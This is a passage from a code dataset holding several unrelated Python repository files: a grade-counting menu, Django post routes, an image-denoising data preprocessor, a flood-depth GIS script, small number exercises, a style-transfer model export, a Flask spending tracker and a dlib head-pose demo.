ALUMNOS\n calificacion = 0\n\n #VARIABLES DE ACUMULACION PARA GUARDAR LA CANTIDAD DE ALUMNOS CON ESTA CALIFICACION\n calificaciones7 = 0\n calificaciones8 = 0\n calificaciones9 = 0\n calificaciones10 = 0\n\n #VARIABLES DE ACUMULACION PARA LOS ALUMNOS QUE APROBARON Y LOS QUE NO\n estudiantes_aprobados = 0\n estudiantes_reprobados = 0\n\n #VARIABLES PARA GRAFICAR SI EL USUARIO SELECCIONA LA OPCION \n A = \"\"\n R = \"\"\n \n\n#MEDIANTE ESTE CICLO FOR LLENAMOS EL ARREGLO CON LAS CALIFICACIONES DE LOS ALUMNOS Y ACUMULAMOS LOS ESTUDIANTES APROBADOS Y REPROBADOS\n for i in range(estudiantes):\n calificacion = int(input(f\"\\nIngrese la Calificacion N° {i + 1}\\n\" )) \n if calificacion >= 7:\n estudiantes_aprobados = estudiantes_aprobados + 1\n if calificacion == 7:\n calificaciones7 = calificaciones7 + 1\n if calificacion == 8:\n calificaciones8 = calificaciones8 + 1\n if calificacion == 9:\n calificaciones9 = calificaciones9 + 1 \n if calificacion == 10:\n calificaciones10 = calificaciones10 + 1 \n else:\n estudiantes_reprobados = estudiantes_reprobados + 1\n\n print(f\"\\nEstudiantes con una calificación de 7: {calificaciones7}\")\n print(f\"Estudiantes con una calificación de 8: {calificaciones8}\")\n print(f\"Estudiantes con una calificación de 9: {calificaciones9}\")\n print(f\"Estudiantes con una calificación de 10: {calificaciones10}\")\n\n print(f\"\\nEstudiantes Que Reprobaron: {estudiantes_reprobados}\\nEstudiantes Que Aprobaron: {estudiantes_aprobados}\")\n \n graficar = input(\"\\n¿Desea Graficar Los Resultados S/N?:\\n\")\n graficar = graficar.upper()\n\n if graficar == \"S\":\n for i in range (estudiantes_aprobados):\n A = A + \"**\"\n \n for i in range (estudiantes_reprobados):\n R = R + \"**\"\n\n print(f\"\\n--------GRÁFICA---------\\nA {A}\\nR {R}\\n\")\n import matplotlib.pyplot as plt\n import numpy as np\n\n #HACEMOS USO DE NUMPY MEDIANTE INTERFAZ GRAFICA SE MUESTRA UN GRAFICO CON LOS ALUMNOS QUE SACARON CALIFICACION DE 7,8,9 Y 10\n #ARREGLO con las calificaciones como string\n calificacionestxt = ['Calificacion 7', 'Calificacion 8', 'Calificacion 9', 'Calificacion 10']\n #ARREGLO con la calificacion como entero\n calificacionesval = [calificaciones7 , calificaciones8 , calificaciones9 , calificaciones10 ]\n\n fig, ax = plt.subplots()\n #Colocamos una etiqueta en el eje Y\n ax.set_ylabel('CANTIDAD DE PERSONAS')\n #Colocamos una etiqueta en el eje X\n ax.set_title('Promedio De Calificaciones APROBATORIAS')\n #Creamos la grafica de barras utilizando 'calificaciones' como eje X y 'CANTIDAD DE PERSONAS CALIFICACIONES' como eje y.\n plt.bar(calificacionestxt, calificacionesval)\n \n #mostramos la grafica con el metodo show()\n gr = plt.show()\n return gr\n else:\n print(\"Saliendo...\\n\") \n##############################################################################################################################\n#PROGRAMA PRINCIPAL\n#CREAMOS UN CICLO PARA SALIR HASTA QUE EL USUARIO SELECCIONE LA OPCION 3 O UNA OPCION DIFERENTE A LA 1 Y 2\nwhile True:\n print(\"********************************\\n***** Bienvenido Al Menu *****\\n********************************\\n1. Fotografías 2.Calificaciones 3. Salir\")\n opcion = int(input(\"Seleccione Una Opcion\\n\"))\n \n #HACEMOS EL LLAMADO A LA FUNCION DE FOTOGRAFIAS Y EJECUTA SU PROCESO\n if opcion == 1:\n Fotografias()\n #HACEMOS EL LLAMADO A LA FUNCION DE CALIFICACIONES Y EJECUTA SU PROCESO ESTA FUNCION RECIBE PARAMETROS Y RETORNA UNA VARIABLE DEPENDIENDO DE LA SELECCION DEL USUARIO\n elif opcion == 2:\n print(\"\\n#########################################\\n#Bienvenido Al Sistema De Calificaciones#\\n#########################################\\n\")\n \n estudiantes = int(input(\"Cantidad de estudiantes en el grupo:\\n\"))\n Calificaciones(estudiantes)\n #SI EL USUARIO SELECCIONA LA OPCION 3 O INGRESA UNA OPCION DIFERENTE A 1 O 2 EL PROGRAMA MOSTRARA UN MENSAJE DE SALIENDO Y FINALIZARA \n else:\n print(\"Saliendo...\")\n break ","repo_name":"MeXinuX/Calificaciones-Fotografias","sub_path":"photo&¬es.py","file_name":"photo&¬es.py","file_ext":"py","file_size_in_byte":7732,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7718342276","text":"\"\"\"Posts URL Configuration\"\"\"\n\nfrom django.urls import path\nfrom posts import views\n\nurlpatterns = [\n\n path('home/', views.HomePostsList.as_view(), name='home'),\n #path('new-post/', views.new_post, name='new-post'),\n path('new-post/', views.CreatePostView.as_view(), name='new-post'),\n path('like/', views.new_like, name='like'),\n path('/new-comment/', views.new_comment, name='new-comment'),\n #path('/comments/', views.list_comments, name='show-comments'),\n path('/comments/', views.PostDetail.as_view(), name='show-comments'),\n #path('//comments/', views.list_comments, name='show-comments-reply'),\n path('//comments/', views.PostDetail.as_view(), name='show-comments-reply'),\n path('/likes/', views.list_likes, name='show-likes'),\n path('saved_posts/', views.list_saved_posts, name='show-saved'),\n path('save_post/', views.save_post, name='save'),\n path('/delete/', views.delete_post, name='delete'),\n path('/like/', views.like_comment, name='comment-like'),\n path('/reply/', views.new_reply, name='reply'),\n path('/create-reply', views.create_reply, name='create-reply'),\n path('/reply-like/', views.like_reply, name='reply-like')\n \n]\n\n\n","repo_name":"magahu/instaclonegram","sub_path":"posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38226783779","text":"# # Data Pre-processing (This code does not need to be run!)\n\n# # Image preparation\n\n# Please note this script does not need to be run. We will provide the pre-processed images in the file named `dataset.parquet`. However, this script will provide evidence of the pre-processing steps we have \n# taken, from the source, up to the dataset export stage.\n# \n# The original dataset is available [here](http://adrianbarburesearch.blogspot.com/p/renoir-dataset.html). We have contacted the author and obtained his permission to use and share a modified copy of the data set for the purpose of this project. We have downloaded the three aligned datasets `Canon T3i`, `Canon S90`, and `Xiaomi Mi3` and saved them in a folder, please replace `ENTER_ALIGNED_PICTURES_FOLDER_HERE` with the full path of the aligned images folder on your computer.\n\nimport cv2\nimport glob\nimport tqdm\nimport os\nfrom collections import defaultdict\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport pyarrow as pa\nimport pyarrow.parquet as pq\nfrom shutil import rmtree, copyfile, copytree\nnp.random.seed(70103)\n\n### clean up the environment\n#### 1. remove the \"data directory\" and create a new one\nos.makedirs(\"data\")\n\n#### 2. remove the images in local folder\nfor file in glob.glob(\"*.png\"):\n os.remove(file)\n \n#### 3. Copy the \"Aligned\" folders in \"data\"\nfor folder in glob.glob(\"ENTER_ALIGNED_PICTURES_FOLDER_HERE/*Aligned*\"):\n copytree(folder, os.path.join(\"data\",folder.split(\"/\")[-1]))\n\n\n# ## 1. Remove irrelevant images and files\n# Remove all the objects which are not needed for the current analysis.\npicturesToRemoveList = glob.glob(\"./**/*_Aligned/**/*full*\") + glob.glob(\"./**/*_Aligned/**/Thumbs*\") + glob.glob(\"./**/*_Aligned/**/*plot*\") + glob.glob(\"./**/*_Aligned/*.txt\") + glob.glob(\"./**/*_Aligned/**/Mask*.bmp\") \nfor file in picturesToRemoveList:\n os.remove(file)\n\n# ## 2. Convert the images to grayscale and save to .png (original files are in .bmp)\n# We list up all the images in the `Mi3_Aligned`, `S90_Aligned` and `T3i_Aligned` folders, then we convert the `bmp` format into `png` and, finally, resize all the pictures to half of their dimensions in order to have more interesting data in the image patches.\npicturesList = glob.glob(\"./**/*_Aligned/**/*.bmp\")\nprint(f\"There are {len(picturesList)} images to convert\")\n\nfor image in tqdm.tqdm(picturesList):\n img = cv2.imread(image)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n ### shrink images\n gray = cv2.resize(gray, (gray.shape[1]//2,gray.shape[0]//2))\n cv2.imwrite(image.replace(\".bmp\",\".png\"),gray)\n\n\n# ## 3. Remove the .bmp pictures since they have been replaced.\npicturesToRemoveList = glob.glob(\"./**/*_Aligned/**/*.bmp\")\nfor file in picturesToRemoveList:\n os.remove(file)\n\n# ## 4. Discard some noisy images\n# We need to discard more data. Each of the subfolders contain some `Batch` folders which indicate a scene. Each scene features a *reference* (the ground truth) and some *noisy images* (input for the denoising model).\n# If there is only `1` noisy picture, this is kept. If there are `2` or more noisy pictures in the `Batch` folder, then a random number is sampled from a categorical with number of categories $k$ corresponding to the number of noisy images in the folder. Then the image corresponding to the index sampled from the categorical distribution is kept.\nfoldersToCheck = glob.glob(\"./**/**/Batch*\")\nfor folder in foldersToCheck:\n ## retrieve the noisy images from the folder\n noisy_images = glob.glob(os.path.join(folder,\"*Noisy.png\"))\n ## there must be at least a noisy image\n assert len(noisy_images)>=1\n ## if only one picture is noisy, keep it. Else, sample from categorical and remove the pictures not corresponding to the sampled index.\n if len(noisy_images)>1:\n idx = np.random.randint(len(noisy_images))\n ## remove the sampled image from the list of the pictures to delete. Send to a dummy. We don't need it.\n noisy_images.pop(idx);\n ## delete the other pictures\n for delImage in noisy_images:\n os.remove(delImage)\n\n \n### THIS PART CAN BE IGNORED BUT IS KEPT FOR REPRODUCIBILITY ##############################\ncopyfile(\"./data/Mi3_Aligned/Batch_014/IMG_20160210_062948Reference.png\", \"reference.png\")\ncopyfile(\"./data/Mi3_Aligned/Batch_014/IMG_20160210_063005Noisy.png\", \"input.png\")\nrmtree(\"./data/Mi3_Aligned/Batch_014\")\nimg = cv2.imread(\"input.png\")[:600,500:1000]\ncv2.imwrite(\"input.png\",img)\nimg = cv2.imread(\"reference.png\")[:600,500:1000]\ncv2.imwrite(\"reference.png\",img) \n###########################################################################################\n\n# ## 5. Dataset generation\nprint(f\"We now have a total of {len(glob.glob('./**/**/**/*.png'))} images\")\n\n# There are in total 240 images, of which 120 include noise and 120 do not. These images are, however, very large. We can therefore split each large image into multiple images of smaller size and square shape (the square shape is not strictly necessary, but it allows the convolutional neural network to optimize memory handling).\n# \n# The split can be done in two different ways:\n# - sliding window\n# - partitioning\n# \n# The *sliding window* method allows to obtain more smaller images from a single large image, as the smaller patches are allowed to overlap. This however can lead to issues of data leakage of the test set into the training set. *Partitioning* allows to deal with the issue by making sure that the intersection between two different patches of the image is the empty set.\n# \n# For this particular project, we decide to split each image into a `128x128` pixel patches. The remainder of the pixels at the border of the images that are too few to result in a patch are discarded.\nallImages = glob.glob(\"./**/**/**/*.png\")\nsize = 128 #set up the size to split in\nimageDictionary = defaultdict(lambda : {\"input\" : 0, \"target\" :0})\ntot_images = 0 #keep track of the total number of images\nfor image in tqdm.tqdm(allImages):\n ### set up the image in a dictionary\n flag = \"input\" if \"Noisy\" in image else \"target\"\n name = image.split(\"/\")[-3].lower() + \"_\" + image.split(\"/\")[-2].lower()\n img = cv2.imread(image, cv2.IMREAD_UNCHANGED)\n h , w = img.shape\n new_h, new_w = h//size * size , w//size * size \n imageDictionary[name][flag] = img[:new_h, :new_w].reshape(h//size, size, -1, size).swapaxes(1,2).reshape(-1,size,size)\n tot_images += imageDictionary[name][flag].shape[0]\n\nprint(f\"The total number of patches is {tot_images}\")\n\nidx = 50\nfig, ax = plt.subplots(nrows=1, ncols=2, figsize=(10,5))\nax[0].imshow(imageDictionary[\"s90_aligned_batch_011\"][\"input\"][idx,...],cmap=\"gray\")\nax[1].imshow(imageDictionary[\"s90_aligned_batch_011\"][\"target\"][idx,...],cmap=\"gray\")\nax[0].axis(\"off\")\nax[1].axis(\"off\")\nplt.suptitle(\"Comparison of Images: Input (left) and Target (right)\")\nplt.tight_layout()\n\n\n# ## 6. Group the images in a large matrix, subsample them, and save them to parquet\n\n# Instantiate a large numpy matrix to store the image data. We will encode the three different cameras as:\n# \n# 0. MI3\n# 1. T3I\n# 2. S90\n# \n# These values will be saved in the first column of the numpy matrix.\n\nnumpy_matrix = np.zeros((tot_images,2*size**2+1), dtype=np.uint8)\ni = 0\nkeys = sorted(list(imageDictionary.keys()))\ncamera_dict = {\"mi3\":0, \"t3i\":1, \"s90\":2}\nfor key in tqdm.tqdm(keys):\n value = imageDictionary[key]\n ### concatenate images horizontally\n concatenated_images = np.concatenate((value[\"input\"].reshape(value[\"input\"].shape[0],-1),value[\"target\"].reshape(value[\"target\"].shape[0],-1)), axis=1)\n concatenated_images = np.concatenate((np.array([camera_dict[key.split(\"_\")[0]]]*concatenated_images.shape[0]).reshape(-1,1), concatenated_images), axis=1)\n numpy_matrix[i:i+concatenated_images.shape[0],:] = concatenated_images\n i+=concatenated_images.shape[0]\n\n\n# We then discard the \"uninteresting\" pictures (those which are black almost everywhere). We then keep only the images whose:\n# - sum of intensities is larger than 10 (remove all black pictures)\n# - the standard deviation is larger than 25 (keep pictures featuring large intensity variations).\nnumpy_matrix = numpy_matrix[np.logical_and((numpy_matrix[:,1:1+size**2]).sum(axis=1) > 10,(numpy_matrix[:,1:1+size**2]).std(axis=1) > 25),:]\n\n\n# Given the 100Mb storage limit, we will only keep 4050 patches from the original dataset. In order to obtain the best results, we first shuffle the dataset, then each of the used cameras will be allocated 1350 images.\n\n### 1. randomly permute the numpy matrix\nnumpy_matrix = numpy_matrix[np.random.permutation(numpy_matrix.shape[0]),:]\n### 2. allocate 1350 images for each camera\ncamera_each = 1350\nnumpy_matrix = numpy_matrix[np.concatenate((np.where(numpy_matrix[:,0]==0)[0][:camera_each],np.where(numpy_matrix[:,0]==1)[0][:camera_each],np.where(numpy_matrix[:,0]==2)[0][:camera_each])),:]\n\n\n# Then we carry out a sanity check to make sure 1350 samples have been drawn from each camera.\nfor i in range(3):\n assert np.sum(numpy_matrix[:,0] == i) == camera_each\n\n\n# And, in the end, we export the image data matrix to a `parquet` file. `Apache Parquet` allows quick data load and high compression for large datasets. The use of `parquet` with the `brotli` scheme is necessary to limit the size of the output file.\nparq_table = pa.table({f\"i_{i}\": numpy_matrix[i,:] for i in range(numpy_matrix.shape[0])})\npa.parquet.write_table(parq_table, \"dataset.parquet\", compression=\"brotli\")\n\n# This concludes the data wrangling from the original data set. We have reduced the original dimension from 11.3Gb to 98Mb.\n\n#### REMOVE UNNEEDED PICTURES###################\nos.remove(\"input.png\")\nos.remove(\"reference.png\")\n################################################","repo_name":"tinosai/UDA_CW4_NUCERA","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":9814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17012052960","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n@author: daisybrown\n\"\"\"\nimport pandas as pd\nimport geopandas as gpd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\n# setting the output file\nout_file = \"flood_levels.gpkg\"\n\n# setting a projection variable\nnc_epsg = 2264\n\n\n# reading in the approproate shape files for LIDAR_LAG\nftp_file = \"./Input Files/Columbus_FP_Info.gpkg\"\n\n# setting the layer and projection for the footprint file\n\nftp = gpd.read_file(ftp_file, layer='Building_Centroids') \n\nftp = ftp.to_crs(epsg=nc_epsg)\n\n# trimming the geospatial data for relevent columns\n\ntrim_ftp = ftp.copy()\n\ntrim_ftp = trim_ftp[['FFE', 'LIDAR_LAG', 'LIDAR_HAG','geometry']]\n\n#%%\n\n# reading in the FEMA flood elevations NC One Data\nflood_file = \"flood_sections_static.gpkg\"\nsections = gpd.read_file(flood_file, layer = \"sections\")\nstatic = gpd.read_file(flood_file, layer = \"static\")\n\n\n# setting the projection \n \nsections = sections.to_crs(epsg=nc_epsg)\nstatic = static.to_crs(epsg=nc_epsg)\n\n# trimming the geospatial data for relevent columns\n\n#%%\n\njoined = trim_ftp.sjoin(sections, how='left', predicate='within')\n\njoined = joined.drop(columns='index_right')\n\njoined[\"depth1\"] = round(joined['ELEV'] - joined['LIDAR_LAG'],2)\n\ndepth1 = joined[\"depth1\"]\n\n\njoined = joined.sjoin(static, how='left', predicate='within')\n\njoined = joined.drop(columns='index_right')\n\nFLD_ZONE_left = joined['FLD_ZONE_left']\nFLD_ZONE_right = joined['FLD_ZONE_right']\n\njoined[\"FLD_ZONE\"] = FLD_ZONE_left.where (FLD_ZONE_left.notna(), FLD_ZONE_right)\n\njoined = joined.drop(columns=['FLD_ZONE_left', 'FLD_ZONE_right'])\n\njoined[\"depth2\"] = round(joined['STATIC_BFE_right'] - joined['LIDAR_LAG'],2)\n\ndepth2 = joined[\"depth2\"]\n\njoined['flood_depth'] = depth1.where( depth1.notna(), depth2 )\n\njoined['Class'] = joined['flood_depth'] > 0\njoined['Class'] = joined['Class'].replace({True:\"Low\", False: \"High\"})\njoined['Class'] = joined['Class'].where(joined['flood_depth'].notna(), \"Not FP\")\n\njoined['Water Level'] = joined['flood_depth'].apply(lambda x: f\"{x:.1f} ft\")\njoined['Water Level'] = joined['Water Level'].where(joined['Class']=='Low', 'Apparently above flood level')\njoined['Water Level'] = joined['Water Level'].where(joined['Class']!='Not FP', 'Not in floodplain')\n\njoined = joined.drop(columns=['depth1', 'depth2', 'STATIC_BFE_left'])\n\njoined.to_file(out_file, layer = \"flood_depth\", index=False)\n\n\n#%%\n\n# drawing a histogram of negative of negative values \n\nneg_depth = joined.query('flood_depth < 0')\nprint(neg_depth.value_counts('flood_depth'))\n# create a new single-panel figure\n\nneg_depth = neg_depth.reset_index()\n\nfig, ax1 = plt.subplots(dpi=300)\n\n# drawing a histogram of median earnings\n# stat keyword indicates that the Y axis of the histogram should \n# be the probability density\n\nsns.histplot(data=neg_depth, x=\"flood_depth\", ax=ax1)\n\n# The shade option causes the area below the curve to be shaded\n\nax1.set_xlabel(\"Negative Flood Depth\")\n\nfig.tight_layout()\n\nfig.savefig(\"negdepth_hist.png\")\n\n#%%\n\n# drawing a histogram of of all depth values \n\njoined = joined.reset_index()\n\n# create a new single-panel figure\n\nfig, ax2 = plt.subplots(dpi=300)\n\n# drawing a histogram of median earnings\n# stat keyword indicates that the Y axis of the histogram should \n# be the probability density\n\nsns.histplot(data=joined, x=\"flood_depth\", ax=ax2)\n\n# The shade option causes the area below the curve to be shaded\n\nax2.set_xlabel(\"All Flood Depths\")\n\nfig.tight_layout()\n\nfig.savefig(\"alldepth_hist.png\")","repo_name":"daisykbrown/pai789_final_project","sub_path":"script7_flood_depth.py","file_name":"script7_flood_depth.py","file_ext":"py","file_size_in_byte":3472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13767237773","text":"x = 1\nnumbers = [float(0)]\nwhile x > 0:\n num = input (\"Enter a number: \",)\n if num == \"done\":\n break\n else:\n try:\n float(num)\n except:\n print(\"Invalid Input\")\n continue\n num = float(num)\n if x == 1:\n numbers[x-1] = num\n else:\n numbers.append(num)\n x = x + 1\n\nprint(\"The maximum value is: \" + str(max(numbers)))\nprint(\"The minimum value is: \" + str(min(numbers)))","repo_name":"FatherSalvi/lis161-py4e","sub_path":"Ch5Ex2.py","file_name":"Ch5Ex2.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20151877353","text":"import torch\nimport torch.nn as nn\nfrom torch.utils.mobile_optimizer import optimize_for_mobile\n\n\nfrom model import Model, AdaIN\n\n\nclass ConvertModel(nn.Module):\n def __init__(self):\n super(ConvertModel, self).__init__()\n self.model = Model()\n self.model.decoder.state_dict(torch.load('./models/decoder_3.pth', map_location='cpu'))\n self.model.encoder\n\n def forward(self, content, style, alpha=0.6):\n content_f = self.model.encoder(content)\n style_f = self.model.encoder(style)\n feat = AdaIN(content_f, style_f)\n feat = feat * alpha + content_f * (1 - alpha)\n return self.model.decoder(feat)\n\n\nmodel = ConvertModel()\n\ndummy_input = torch.rand(1, 3, 512, 512)\n\ntraced_model = torch.jit.trace(model, (dummy_input, dummy_input))\noptimized_model = optimize_for_mobile(traced_model)\n\noptimized_model.save('style_transfer.pt')\n\nmodel_load = torch.jit.load('style_transfer.pt')\n","repo_name":"Picture-GSM/Picture-AI","sub_path":"convert2coreml.py","file_name":"convert2coreml.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24480975155","text":"import openai\nimport pprint\nimport os\n\n\nopenai.organisation = os.getenv(\"OPENAI_ORGANIZATION\")\nopenai.api_key = os.getenv(\"OPENAI_API_KEY\")\n\nGPT4 = 'gpt-4-0314'\nMODEL_NAME = GPT4\nmodel = openai.Model(MODEL_NAME)\n\ndef list_all_models():\n model_list = openai.Model.list()['data']\n model_ids = [x['id'] for x in model_list]\n model_ids.sort()\n pprint.pprint(model_ids)\n\nif __name__ == '__main__':\n list_all_models()","repo_name":"JimVincentW/bt-reviewer","sub_path":"oai_models.py","file_name":"oai_models.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"24280887482","text":"from flask import Flask, render_template, request, redirect\nfrom flask import Blueprint\nfrom models.transaction import Transaction\nimport repositories.transaction_repository as transaction_repository\nimport repositories.tag_repository as tag_repository\nimport repositories.merchant_repository as merchant_repository\nimport repositories.limit_repository as limit_repository\n\ntransactions_blueprint = Blueprint(\"transactions\", __name__)\n\n# show all transactions with conditional loops to manage spending limit notificication feature\n@transactions_blueprint.route(\"/transactions\")\ndef transactions():\n transactions = transaction_repository.select_all()\n total = transaction_repository.total_spending()\n limit = limit_repository.select_last()\n near_limit = False\n if total >= limit.notification_point:\n near_limit = True\n over_limit = False\n if total > limit.spending_limit:\n near_limit = False\n over_limit = True\n on_limit = False\n if total == limit.spending_limit:\n near_limit = False\n over_limit = False\n on_limit = True\n return render_template(\"transactions/index.html\", transactions=transactions, total_spend=total, near_limit=near_limit, over_limit=over_limit, on_limit=on_limit)\n\n# show all transactions sorted by date\n@transactions_blueprint.route(\"/transactions/sortby_date\")\ndef transactions_by_date():\n transactions = transaction_repository.select_all_by_date()\n total = transaction_repository.total_spending()\n return render_template(\"transactions/date.html\", transactions=transactions, total_spend=total)\n\n# show all transactions sorted by amount\n@transactions_blueprint.route(\"/transactions/sortby_amount\")\ndef transactions_by_amount():\n transactions = transaction_repository.select_all_by_amount()\n total = transaction_repository.total_spending()\n return render_template(\"transactions/amount.html\", transactions=transactions, total_spend=total)\n\n# takes user to form to add new transaction\n@transactions_blueprint.route(\"/transactions/new\")\ndef new_transaction():\n tags = tag_repository.select_all()\n merchants = merchant_repository.select_all()\n return render_template(\"transactions/new.html\", all_tags=tags, all_merchants=merchants)\n\n# route after pressing submit on 'add new transaction' page, to pull info from the form\n@transactions_blueprint.route(\"/transactions\", methods=['POST']) \ndef create_transaction():\n amount = request.form['amount']\n tag_id = request.form['spending_type']\n merchant_id = request.form['merchant']\n date = request.form['date']\n tag = tag_repository.select(tag_id)\n merchant = merchant_repository.select(merchant_id)\n transaction = Transaction(amount, tag, merchant, date)\n transaction_repository.save(transaction)\n return redirect('/transactions')\n\n# takes user to form of selected transaction, to edit transaction\n@transactions_blueprint.route(\"/transactions//edit\", methods=['GET', 'POST'])\ndef edit_transaction(id):\n transaction = transaction_repository.select(id)\n tags = tag_repository.select_all()\n merchants = merchant_repository.select_all()\n return render_template(\"/transactions/edit.html\", transaction=transaction, all_tags=tags, all_merchants=merchants)\n\n# updates the task edited in /transactions/edit form\n@transactions_blueprint.route(\"/transactions/\", methods=['POST'])\ndef update_transaction(id):\n amount = request.form['amount']\n tag_id = request.form['tag']\n merchant_id = request.form['merchant']\n date = request.form['date']\n tag = tag_repository.select(tag_id)\n merchant = merchant_repository.select(merchant_id)\n transaction = Transaction(amount, tag, merchant, date, id)\n transaction_repository.update(transaction)\n return redirect('/transactions')\n\n@transactions_blueprint.route(\"/transactions//delete\", methods=['POST'])\ndef delete_transaction(id):\n transaction_repository.delete(id)\n return redirect(\"/transactions\")\n\n\n","repo_name":"madgelackie/spending_tracker_project","sub_path":"controllers/transactions_controller.py","file_name":"transactions_controller.py","file_ext":"py","file_size_in_byte":3971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72329120091","text":"def adding(numbers):\n return sum(int(digit) for digit in str(numbers))\n\nprint(adding(163783))\n\n\ndef adding(numbers):\n total = 0\n for number in str(numbers):\n total += int(number)\n return total\n\nprint(adding(9876))\n\ndef addNumbers(numbers):\n total = 0\n for x in str(numbers):\n total += int(x)\n return total\n\nprint(addNumbers(423566))\n\ndef addNumbersFromList(numbers):\n total = 0\n for x in numbers:\n total += x\n return total\n\nprint(addNumbersFromList([3, 4, 6, 4, 2, 2, 3]))\n\ndef addingNumbers(numbers):\n total = 0\n for number in str(numbers):\n total += int(number)\n return total\n\nprint(addingNumbers(9876))\n\n\ndef addingDigits(numbers):\n return sum(int(x) for x in str(numbers))\n\nprint(addingDigits(16523783))\n","repo_name":"jakubfolta/AddDigits","sub_path":"AddNumb.py","file_name":"AddNumb.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43462484102","text":"## need opencv, numpy, imutils and dlib installed\n## tuvovan\n\nimport math\nimport cv2\nimport numpy as np \nfrom imutils import face_utils\nimport dlib\n\n# get 2D points\ndef get_2D_points(subject):\n shape = predictor(gray, subject)\n shape = face_utils.shape_to_np(shape) \n left_eye_left = shape[36]\n right_eye_right = shape[45]\n nose_top = shape[33]\n chin = shape[8]\n left_mouth_conner = shape[48]\n right_mouth_conner = shape[54]\n up_eye = shape[37]\n down_eye = shape[40]\n\n return np.array([up_eye, down_eye]), np.array([nose_top, chin, left_eye_left, right_eye_right, left_mouth_conner, right_mouth_conner], dtype='double')\n\n## 3D points\nmodel_points = np.array(\n [\n (0.0, 0.0, 0.0),\n (0.0, -330.0, -65.0),\n (-165.0, 170.0, -135.0),\n (165.0, 170.0, -135.0),\n (-150.0, -150.0, -125.0),\n (150.0, -150.0, -125.0)\n ]\n)\n\n## Get pose\ndef get_pose(model_points, image_points, frame):\n size = frame.shape\n # focal_length = size[1]\n center = (size[1]/2, size[0]/2)\n focal_length = center[0]/ np.tan(60/2 * np.pi /180)\n\n camera_matrix = np.array(\n [\n [focal_length, 0, center[0]],\n [0, focal_length, center[1]],\n [0, 0 , 1]\n ], dtype = 'double'\n )\n\n dist_coeffs = np.zeros((4,1))\n\n ## new here replace the axis\n axis = np.float32(\n [\n [500,0,0],\n [0,500,0],\n [0,0,500]\n ]\n )\n (_, rotation_vector, translation_vector) = cv2.solvePnP(model_points, image_points, camera_matrix, dist_coeffs)\n\n (nose_end_point2D, jacobian) = cv2.projectPoints(axis, rotation_vector, translation_vector, camera_matrix, dist_coeffs)\n (modelpts, jacobian2) = cv2.projectPoints(model_points, rotation_vector, translation_vector, camera_matrix, dist_coeffs)\n rvec_matrix = cv2.Rodrigues(rotation_vector)[0]\n\n proj_matrix = np.hstack((rvec_matrix, translation_vector))\n\n eulerAngles = cv2.decomposeProjectionMatrix(proj_matrix)[6]\n\n pitch, yaw, roll = [math.radians(_) for _ in eulerAngles]\n\n pitch = math.degrees(math.asin(math.sin(pitch)))\n yaw = math.degrees(math.asin(math.sin(yaw)))\n roll = math.degrees(math.asin(math.sin(roll)))\n\n for p in image_points:\n cv2.circle(frame, (int(p[0]), int(p[1])), 3, (0, 0 , 255), -1)\n p1 = (int(image_points[0][0]), int(image_points[0][1]))\n p2 = tuple(nose_end_point2D[1].ravel())\n p3 = tuple(nose_end_point2D[0].ravel())\n p4 = tuple(nose_end_point2D[2].ravel())\n\n cv2.line(frame, p1, p2, (0, 255 , 0), 3)\n cv2.line(frame, p1, p3, (255, 0 , 0), 3)\n cv2.line(frame, p1, p4, (0, 0 , 255), 3)\n\n\n# add glasses\ndef add_glasses(frame, glasses, left_eye_left, right_eye_right, up_eye, down_eye):\n glasses_width = np.int(np.abs(right_eye_right[0] - left_eye_left[0])*1.3)\n glasses_height = np.int(np.abs(up_eye[1] - down_eye[1])*1.5)\n glasses_resized = cv2.resize(glasses, (glasses_width, glasses_height))\n transparent_region = glasses_resized[:,:,:3] != 0\n\n frame[int(left_eye_left[1]):int(left_eye_left[1])+glasses_height, int(left_eye_left[0]):int(left_eye_left[0])+glasses_width,:][transparent_region] = glasses_resized[:,:,:3][transparent_region]\n # frame[int(left_eye_left[0]):int(right_eye_right[0]),int(left_eye_left[1]):int(right_eye_right[1]), :][transparent_region] = glasses_resized[:,:,:3][transparent_region]\n\n\n\ncap = cv2.VideoCapture(0)\nprint(\"[INFO] loading facial landmark predictor...\")\ndetector = dlib.get_frontal_face_detector()\npredictor = dlib.shape_predictor('shape_predictor_68_face_landmarks.dat')\nsunglasses = cv2.imread('sunglasses.png')\nwhile True:\n ret, frame = cap.read()\n frame = cv2.resize(frame, (600, 600))\n\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n subjects = detector(gray, 0)\n\n for subject in subjects:\n up_down, image_points = get_2D_points(subject)\n get_pose(model_points, image_points, frame)\n add_glasses(frame, sunglasses, image_points[2], image_points[3], up_down[0], up_down[1])\n frame = cv2.flip(frame, 1)\n cv2.imshow('out', frame)\n key = cv2.waitKey(1) & 0xFF\n if key == ord('q'):\n break\ncv2.destroyAllWindows()\ncap.release()","repo_name":"tuvovan/Face-Pose-Estimation","sub_path":"face_pose.py","file_name":"face_pose.py","file_ext":"py","file_size_in_byte":4210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31548998477","text":"n = int(input(\"Enter number of students: 